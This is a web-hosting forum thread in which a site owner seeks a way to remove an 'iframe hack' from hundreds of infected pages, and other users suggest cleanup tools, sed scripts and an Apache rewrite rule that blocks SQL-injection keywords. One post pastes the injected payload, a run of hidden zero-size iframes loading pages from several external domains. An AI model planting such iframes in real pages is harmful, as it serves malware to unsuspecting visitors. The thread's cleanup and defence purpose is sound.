How can you remove the iframe hack server wide?

[WebHostPro]

I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks

 

[javiercampos]

I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks

hi
everything good writing is translated by google hehe, since I'm from chile and handling not much English but I want to help.

looks good would recommend you first remove the general iframe mind are embedded in the index when you delete, change the access codes and install this application

Installation » Anti-Gumblar

 

[Data 1]

I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks

Depends on the hack. I have a file I found on the internet that cleans GNU-GPL and others with a few text changes, but to get it to work I have to make all the files writable. What I have been doing is making everything writable, running the fix file, download the directory to my computer (doubles as a virus checker also), deleting the files on the server and re uploading to reset permissions. I know it's a kludge but it has been working great. You will have to e-mail me for the file unless management don't mind me posting it here.

 

[ModServ]

I tried this in httpd.conf but don't know if its working good or now

RewriteCond %{QUERY_STRING}    ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]

But after that I didn't suffer from iframe.

 

[thewebhosting]

I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks

Kindly check the below mentioned URL which might helps you to solve your issue:

How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files - Gabriel - Web Design, Development and Business … infopoet

 

[WebHostPro]

hi
everything good writing is translated by google hehe, since I'm from chile and handling not much English but I want to help.

looks good would recommend you first remove the general iframe mind are embedded in the index when you delete, change the access codes and install this application

Installation » Anti-Gumblar

I did this but I don't know what do after it's installed. How do I run it to remove the thousands of pages infected?

Or is this just to prevent it?

Also here is the code of this helps:

<iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

 

[rnawky]

I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

Anyone know of I can possibly do this?

I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

Thanks

Try using the sed command combined with find and xargs.

Find and Replace with Sed

 

[semoweb]

Not sure im afraid you might have to remove the iframe manually :-(

 

[neonix]

Hi,

I had a similar problem and this link helped.

Linux - Search and replace over multiple files.